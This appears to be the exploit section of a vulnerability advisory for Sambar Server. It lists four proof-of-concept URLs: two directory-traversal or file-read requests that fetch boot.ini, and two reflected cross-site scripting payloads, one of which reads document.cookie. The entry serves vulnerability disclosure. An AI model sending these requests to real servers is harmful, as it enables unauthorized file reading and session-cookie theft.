• info
• discussion
• exploit
• solution
• references

Sambar Server Multiple Vulnerabilities

The following proof of concept is available:

http://www.example.com/sysadmin/system/showini.asp?file=\..\..\..\..\..\..\..\boot.ini

http://www.example.com/sysadmin/system/showlog.asp?log=c:\boot.ini&tail=y

http://www.example.com/sysadmin/system/show.asp?show=<script>alert("oops")</script>
http://www.example.com/sysadmin/system/showperf.asp?area=search&title=<script>alert(document.cookie)</script>